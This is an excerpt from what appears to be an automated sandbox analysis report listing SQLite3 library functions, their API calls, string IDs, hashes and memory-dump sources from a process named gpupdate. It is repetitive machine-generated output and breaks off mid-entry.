                                              • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_free_filenamesqlite3_vfs_find
                                              • String ID: @$access$cache$a
                                              • API String ID: 4214946475-2469596308
                                              • Opcode ID: 4dc48ca85f95b71500761f5ad4bf347c2b12146ca60df0a27e3ccc04f04ab659
                                              • Instruction ID: 42542c176ef09d743d5dd9e72e152875b66345e0d07caa11d28df0506bdcb7d6
                                              • Opcode Fuzzy Hash: 4dc48ca85f95b71500761f5ad4bf347c2b12146ca60df0a27e3ccc04f04ab659
                                              • Instruction Fuzzy Hash: A2D16D70D08B698BEB15CFA8C48039EBBF1AFC9308F64C459D896AB351D735D846CB52
                                              Function 61E3D85B Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 140COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_create_module.SQLITE3 ref: 61E3D882
                                              • sqlite3_malloc.SQLITE3 ref: 61E3D896
                                                • Part of subcall function 61E2FCC8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E2F7C6), ref: 61E2FCD0
                                                • Part of subcall function 61E33A55: sqlite3_free.SQLITE3 ref: 61E33AF6
                                                • Part of subcall function 61E33A55: sqlite3_free.SQLITE3 ref: 61E33B03
                                              • sqlite3_free.SQLITE3 ref: 61E3DACC
                                                • Part of subcall function 61E33A55: sqlite3_free.SQLITE3 ref: 61E33BA8
                                              • sqlite3_create_function.SQLITE3 ref: 61E3D964
                                              • sqlite3_create_function.SQLITE3 ref: 61E3D9AA
                                              • sqlite3_overload_function.SQLITE3 ref: 61E3D9CC
                                                • Part of subcall function 61E3D714: sqlite3_mutex_enter.SQLITE3 ref: 61E3D72C
                                                • Part of subcall function 61E3D714: sqlite3_mutex_leave.SQLITE3 ref: 61E3D754
                                                • Part of subcall function 61E3D714: sqlite3_mprintf.SQLITE3 ref: 61E3D765
                                                • Part of subcall function 61E3D714: sqlite3_create_function_v2.SQLITE3 ref: 61E3D7AA
                                              • sqlite3_overload_function.SQLITE3 ref: 61E3D9EE
                                              • sqlite3_overload_function.SQLITE3 ref: 61E3DA10
                                              • sqlite3_overload_function.SQLITE3 ref: 61E3DA32
                                              • sqlite3_overload_function.SQLITE3 ref: 61E3DA54
                                                • Part of subcall function 61E19E3A: sqlite3_mutex_enter.SQLITE3 ref: 61E19E57
                                                • Part of subcall function 61E19E3A: sqlite3_mutex_leave.SQLITE3 ref: 61E19E95
                                              • sqlite3_create_module.SQLITE3 ref: 61E3DAB6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_overload_function$sqlite3_free$sqlite3_create_functionsqlite3_create_modulesqlite3_mutex_entersqlite3_mutex_leave$sqlite3_create_function_v2sqlite3_initializesqlite3_mallocsqlite3_mprintf
                                              • String ID: `pa$fts3$fts4$porter$simple$unicode61
                                              • API String ID: 1985515826-1312508094
                                              • Opcode ID: 4ca73491d6c0618c43933298180b1ddde4dbcfc63974a8328fefe14f1100daa6
                                              • Instruction ID: 9d7571ecb31df85e56d612ff42af73b09ec16e188b71f43af699afbe0cc19584
                                              • Opcode Fuzzy Hash: 4ca73491d6c0618c43933298180b1ddde4dbcfc63974a8328fefe14f1100daa6
                                              • Instruction Fuzzy Hash: B051E5B060C7529BE3019F65C59232ABAE4BFC1758F24C81CE8C98F391D3B9C546DB82
                                              Function 61E31FF3 Relevance: 28.6, APIs: 19, Instructions: 136COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_stricmp.SQLITE3 ref: 61E3200D
                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E32019
                                              • sqlite3_value_int.SQLITE3 ref: 61E32026
                                              • sqlite3_stricmp.SQLITE3 ref: 61E3204E
                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E3205A
                                              • sqlite3_value_int.SQLITE3 ref: 61E32069
                                              • sqlite3_stricmp.SQLITE3 ref: 61E32089
                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E32095
                                              • sqlite3_value_int.SQLITE3 ref: 61E320A4
                                              • sqlite3_stricmp.SQLITE3 ref: 61E320D0
                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E320DC
                                              • sqlite3_value_int.SQLITE3 ref: 61E320EA
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                              • String ID:
                                              • API String ID: 2723203140-0
                                              • Opcode ID: 76a2a4a2ba42d4edeb21c396667249bb58923a8a5a55c966820c0c4f148760db
                                              • Instruction ID: 1b3f52eed1cbb144a3098fef0f8b73e12497fa85325e772be495f3ccf89249a8
                                              • Opcode Fuzzy Hash: 76a2a4a2ba42d4edeb21c396667249bb58923a8a5a55c966820c0c4f148760db
                                              • Instruction Fuzzy Hash: 694106B85087579AD301AFB9C98025ABAF5AFD9348F31C92DC5C68B354E735D441CB82
                                              Function 61E1E9A8 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 219COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_str_append.SQLITE3 ref: 61E1EA46
                                              • sqlite3_str_append.SQLITE3 ref: 61E1EA5C
                                              • sqlite3_str_append.SQLITE3 ref: 61E1EAA1
                                              • sqlite3_str_appendf.SQLITE3 ref: 61E1EACB
                                                • Part of subcall function 61E1E419: sqlite3_str_vappendf.SQLITE3 ref: 61E1E433
                                              • sqlite3_str_append.SQLITE3 ref: 61E1EB2E
                                              • sqlite3_str_appendf.SQLITE3 ref: 61E1EBD4
                                              • sqlite3_str_appendf.SQLITE3 ref: 61E1EC7C
                                              • sqlite3_str_appendf.SQLITE3 ref: 61E1ECB4
                                              • sqlite3_str_append.SQLITE3 ref: 61E1ECD9
                                              • sqlite3_str_appendf.SQLITE3 ref: 61E1ED12
                                              • sqlite3_str_append.SQLITE3 ref: 61E1ED32
                                              • sqlite3_str_reset.SQLITE3 ref: 61E1ED4E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_str_append$sqlite3_str_appendf$sqlite3_str_resetsqlite3_str_vappendf
                                              • String ID: d
                                              • API String ID: 4035452181-2564639436
                                              • Opcode ID: 42eaba9e7bcad1adbf2264879422b691981a7dbc364f2d5ec554b51104ce1c0f
                                              • Instruction ID: 5526264d43a097047b94b65181e84d97551aa9821c514e7a45cd70a0e731890c
                                              • Opcode Fuzzy Hash: 42eaba9e7bcad1adbf2264879422b691981a7dbc364f2d5ec554b51104ce1c0f
                                              • Instruction Fuzzy Hash: C6A117B09097558BEB21CF59C881B99BBF0BB85308F24C8DEE088AB754C774D985CF52
                                              Function 61E300EB Relevance: 22.6, APIs: 15, Instructions: 149COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_value_blobsqlite3_value_dup$memcmpsqlite3_result_error_nomemsqlite3_result_int
                                              • String ID:
                                              • API String ID: 244440772-0
                                              • Opcode ID: 0d91f46b37509683dca2867fcf9b7ddd86a68b8be825258902a5d7a0e1cbb3fe
                                              • Instruction ID: b56db1ee6ced4df66dd4c90bc2ce1a2fa20fed57972474851b55b3675cc85ae2
                                              • Opcode Fuzzy Hash: 0d91f46b37509683dca2867fcf9b7ddd86a68b8be825258902a5d7a0e1cbb3fe
                                              • Instruction Fuzzy Hash: B2514F71A086698FDB019FE9C48079DBBF1AFC9704F25852DE894E7306D735D882CB91
                                              Function 61E1771E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 106COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_str_append.SQLITE3 ref: 61E17752
                                              • sqlite3_str_append.SQLITE3 ref: 61E1776F
                                              • sqlite3_str_append.SQLITE3 ref: 61E17794
                                              • sqlite3_str_appendall.SQLITE3 ref: 61E177D2
                                              • sqlite3_str_append.SQLITE3 ref: 61E177F5
                                              • sqlite3_str_append.SQLITE3 ref: 61E1780C
                                              • sqlite3_str_append.SQLITE3 ref: 61E17829
                                              • sqlite3_str_append.SQLITE3 ref: 61E1784B
                                              • sqlite3_str_append.SQLITE3 ref: 61E17864
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_str_append$sqlite3_str_appendall
                                              • String ID: (,)?$<expr>$rowid
                                              • API String ID: 851024535-569625528
                                              • Opcode ID: 38fa36e01d9be6b30106024f6c27d9833571a20ade45a4e9eda0c72372efc929
                                              • Instruction ID: c19452ff0fe8d0851c5d73e5652e06cdee573f50a4eec5d95e803d22a1d05518
                                              • Opcode Fuzzy Hash: 38fa36e01d9be6b30106024f6c27d9833571a20ade45a4e9eda0c72372efc929
                                              • Instruction Fuzzy Hash: 98412BB0D087419BC700DF69C58665EBFE0BB94B18F31C96DE8984B3A5C775D881CB41
                                              Function 61E3035A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 177COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_malloc.SQLITE3 ref: 61E3036A
                                                • Part of subcall function 61E2FCC8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E2F7C6), ref: 61E2FCD0
                                                • Part of subcall function 61E19E3A: sqlite3_mutex_enter.SQLITE3 ref: 61E19E57
                                                • Part of subcall function 61E19E3A: sqlite3_mutex_leave.SQLITE3 ref: 61E19E95
                                              • sqlite3_create_function.SQLITE3 ref: 61E3040A
                                              • sqlite3_create_function.SQLITE3 ref: 61E30451
                                              • sqlite3_create_function.SQLITE3 ref: 61E3049C
                                              • sqlite3_create_function.SQLITE3 ref: 61E30503
                                              • sqlite3_create_function.SQLITE3 ref: 61E3060B
                                              • sqlite3_create_function.SQLITE3 ref: 61E3064E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_create_function$sqlite3_initializesqlite3_mallocsqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID: fts5$fts5vocab${a$~a
                                              • API String ID: 700253140-434851157
                                              • Opcode ID: d621e80cbb89dfe7a9f84cc6b72847a1583fc0942a5b70cd1205df3fbf8e9ae7
                                              • Instruction ID: 54b5f24608d6f3dad2e06a0f48b5eb1dad14b9eb04455d30f6794c26fb7d0ec3
                                              • Opcode Fuzzy Hash: d621e80cbb89dfe7a9f84cc6b72847a1583fc0942a5b70cd1205df3fbf8e9ae7
                                              • Instruction Fuzzy Hash: 6B819FB09083529BE710CF69C59574ABBF0BFC4758F21C92CE8998B384D3B5D949CB82
                                              Function 61E3F1AF Relevance: 18.4, APIs: 12, Instructions: 379COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_text$sqlite3_value_int$sqlite3_mallocsqlite3_result_error
                                              • String ID:
                                              • API String ID: 3802728871-0
                                              • Opcode ID: d416a25abc1b44d1876ca590d2fd81d1c88ee593ec18814a47ee1bb2b9364330
                                              • Instruction ID: 449272fd3fed0595a2d232e1dae38bceeff2debb18c5a5299c86f4e647b7cf9f
                                              • Opcode Fuzzy Hash: d416a25abc1b44d1876ca590d2fd81d1c88ee593ec18814a47ee1bb2b9364330
                                              • Instruction Fuzzy Hash: B1128174905329DFDB50DF68C984B8DBBF1BF88314F1085AAE898A7350E7349A85CF52
                                              Function 61E353EB Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 358stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: strncmp
                                              • String ID: -$-$0$]$false$null$true$}
                                              • API String ID: 1114863663-1443276563
                                              • Opcode ID: 3ea5e169e498f99209cae7fbc201e9e87264f61c0c16de2356b70432091bf717
                                              • Instruction ID: 943e06534229e47631efb3851db519decc9ca91371c9c719c6b2ea8b9a4914e5
                                              • Opcode Fuzzy Hash: 3ea5e169e498f99209cae7fbc201e9e87264f61c0c16de2356b70432091bf717
                                              • Instruction Fuzzy Hash: 00D1D670B0826A8FDB16CFA8C4503ADFBF1AF89318FA8C65AC49187395C339D446CB55
                                              Function 61E3DB5F Relevance: 16.7, APIs: 11, Instructions: 193COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E0ABE5: sqlite3_free.SQLITE3 ref: 61E0ABF4
                                                • Part of subcall function 61E0ABE5: sqlite3_free.SQLITE3 ref: 61E0ABFF
                                              • sqlite3_value_text.SQLITE3 ref: 61E3DB8C
                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3DB9F
                                              • sqlite3_malloc64.SQLITE3 ref: 61E3DBB4
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_value_bytessqlite3_value_text
                                              • String ID:
                                              • API String ID: 3723316075-0
                                              • Opcode ID: 3e05af13082c99a8f16b6e04be81188c73d55ea634fcaee9b66aeb622b7f2eff
                                              • Instruction ID: 60bcd5dbe481254fd60023ff9bc16e5218ad0e9d1a47a46c8477e5733003fd9a
                                              • Opcode Fuzzy Hash: 3e05af13082c99a8f16b6e04be81188c73d55ea634fcaee9b66aeb622b7f2eff
                                              • Instruction Fuzzy Hash: 8F8158B89042558FDB04DF69C48479ABBF1BF89318FA5C5A9D8488B369D738D881CF81
                                              Function 61E0D856 Relevance: 16.6, APIs: 11, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free
                                              • String ID:
                                              • API String ID: 2313487548-0
                                              • Opcode ID: ace55a4f603742274b9daf38ad6c4eaa617d612ee77bbdfef22cb4cb313b7c10
                                              • Instruction ID: 3f6b8504bbbef8b34876501b9d15fe52585d4d5d693626048d1cc00b471651bd
                                              • Opcode Fuzzy Hash: ace55a4f603742274b9daf38ad6c4eaa617d612ee77bbdfef22cb4cb313b7c10
                                              • Instruction Fuzzy Hash: 3D1198B4944749CBDB00FF78C0C441ABBE4FF88315B52889DDD988B316D735D8A08B95
                                              Function 61E3667E Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 389COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: false$null$true
                                              • API String ID: 0-2913297407
                                              • Opcode ID: f6e7fffd0abdfd7270a7e5a3c431f91d6c16927630dd229e088565c78d856579
                                              • Instruction ID: 746fe345079a1ec49bb6bf2e6740ba61aaa019b51b7e3fe3cf8acc2cee2e7ef0
                                              • Opcode Fuzzy Hash: f6e7fffd0abdfd7270a7e5a3c431f91d6c16927630dd229e088565c78d856579
                                              • Instruction Fuzzy Hash: 11E1AD71E092A58BDB01CFBCC480799BBB1EBCD358F28C56AD8549B349D334DA46CB91
                                              Function 61E3EBD2 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 220COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mprintf.SQLITE3 ref: 61E3EBEB
                                                • Part of subcall function 61E3A372: sqlite3_initialize.SQLITE3 ref: 61E3A378
                                                • Part of subcall function 61E3A372: sqlite3_vmprintf.SQLITE3 ref: 61E3A392
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                              • String ID: + $ NOT $ OR $"$(,)?
                                              • API String ID: 2841607023-154350868
                                              • Opcode ID: 5dfc29dcde1552e0ddbc56c2e549e4e0a91d7367c493f208b3e9aa24814969b4
                                              • Instruction ID: 3b3c40da48a664bdeb51678a4391f65d0febee223e0741770a7baeeac17347c7
                                              • Opcode Fuzzy Hash: 5dfc29dcde1552e0ddbc56c2e549e4e0a91d7367c493f208b3e9aa24814969b4
                                              • Instruction Fuzzy Hash: AA915070A08A668FDB15CFAAC48469DBBF1BFC9314F29C569E894AB341D334DC41CB61
                                              Function 61E01040 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 132sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
